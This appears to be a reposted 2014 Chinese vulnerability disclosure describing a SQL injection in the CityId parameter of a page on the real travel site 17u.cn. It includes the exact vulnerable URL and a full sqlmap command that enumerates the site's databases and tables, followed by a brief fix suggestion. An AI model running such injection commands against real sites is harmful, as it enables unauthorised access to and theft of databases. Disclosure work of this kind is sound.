同程17u.cn主站SQL注射可致数据库泄露下载
-
来源:黑吧安全网 浏览:1153次 时间:2014-04-28
同程 17u.cn 主站SQL注射 可致数据库泄露
SQLMAP 获取数据库名称 和 数据表名称 演示,仅表名称,不再继续深入
之前的漏洞都修补完了,但目测还是漏了一个
漏洞位置:
http://www.17u.cn/communityhotel.aspx?ChainId=&CityId=1&page=5
参数CityId没有过滤,引发注射
SQLMAP获取数据演示
C:\Users\Administrator>sqlmap.py -u "http://www.17u.cn/communityhotel.aspx?ChainId=&CityId=1&page=5" --dbms="microsoft sql server" -p CityId --technique T --tables
28个数据库
数据库名称
获取几个数据库的表名称,危害证明充分,测试到此为止
修复方案:
过滤漏洞位置的几个参数
上一篇: 拉手网IOS客户端SQL注入一枚多库下载
下一篇: 星外虚拟主机跨web目录文件读取漏洞下载